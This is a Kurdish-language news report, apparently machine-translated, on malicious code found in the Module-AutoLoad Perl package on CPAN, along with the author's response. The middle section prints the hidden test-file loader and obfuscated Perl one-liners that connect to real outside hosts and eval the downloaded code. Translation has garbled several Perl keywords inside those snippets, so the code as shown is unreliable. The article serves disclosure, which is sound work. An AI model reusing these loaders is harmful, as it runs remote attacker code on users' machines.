ProHoster > Blog > nûçeyên înternetê > Koda xerab di pakêta Module-AutoLoad Perl de hate dîtin

Koda xerab di pakêta Module-AutoLoad Perl de hate dîtin

Di pakêtek Perl de ku bi navgîniya pelrêça CPAN ve hatî belav kirin Modul-AutoLoad, hatî çêkirin ku bixweber modulên CPAN-ê di firînê de bar bike, nas kirin koda xerab. The insert xerab bû dîtin di koda testê de 05_rcx.t, ku ji sala 2011 ve tê şandin.
Hêjayî gotinê ye ku pirsên di derbarê barkirina koda gumanbar de derketin holê Stackoverflow dîsa di sala 2016 de.

Çalakiya xerab bi hewldanek ji bo dakêşandin û pêkanîna kodê ji serverek sêyemîn (http://r.cx:1/) di dema pêkanîna komek ceribandinê de ku dema sazkirina modulê hatî destpêkirin de vedihewîne. Tê texmîn kirin ku koda ku di destpêkê de ji pêşkêşkara derveyî hatî dakêşandin ne xirab bû, lê naha daxwazî ​​ber bi domaina ww.limera1n.com ve tê veguheztin, ku beşa wê ya kodê ji bo darvekirinê peyda dike.

Ji bo sazkirina dakêşanê di pelê de 05_rcx.t Koda jêrîn tê bikaranîn:

min $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Koda diyarkirî dibe sedem ku skrîpt were darve kirin ../contrib/RCX.pl, naveroka ku ji rêzê kêm dibe:

lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88 bikar bînin.":1″};

Ev skrîpt bar dike şaş kirin xizmetê bi kar tînin perlobfuscator.com koda ji mêvandarê derveyî r.cx (kodên karakterê 82.46.99.88 bi nivîsa "R.cX" re têkildar in) û wê di bloka eval de bicîh dike.

$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; çap bike <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Piştî pakkirinê, jêrîn di dawiyê de têne darve kirin: koda:

çap bike{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor vegera warn$@while$b;1

Pakêta pirsgirêk niha ji depoyê hatiye derxistin. MIZDAN (Perl Authors Upload Server), û hesabê nivîskarê modulê tê asteng kirin. Di vê rewşê de, modul hîn jî dimîne berdeste di arşîva MetaCPAN-ê de ye û dikare rasterast ji MetaCPAN-ê bi karanîna hin karûbarên wekî cpanminus were saz kirin. Tê destnîşan kirinku pakêt bi berfirehî nehat belavkirin.

Balkêş e ku gotûbêj bikin ve girêdayî ye û nivîskarê modulê, ku agahî red kir ku koda xerab piştî ku malpera wî "r.cx" hate hackkirin û diyar kir ku ew tenê kêfê dike, û perlobfuscator.com bikar aniye ne ji bo veşartina tiştekî, lê ji bo kêmkirina mezinahiyê. ya kodê û hêsankirina kopîkirina wê bi rêya clipboard. Hilbijartina navê fonksiyonê "botstrap" bi vê yekê tê ravekirin ku ev peyv "wek bot dixuye û ji bootstrap kurttir e." Nivîskarê modulê di heman demê de piştrast kir ku manipulasyonên naskirî kiryarên xirab nakin, lê tenê barkirin û pêkanîna kodê bi TCP-ê ve destnîşan dikin.

Source: opennet.ru

Add a comment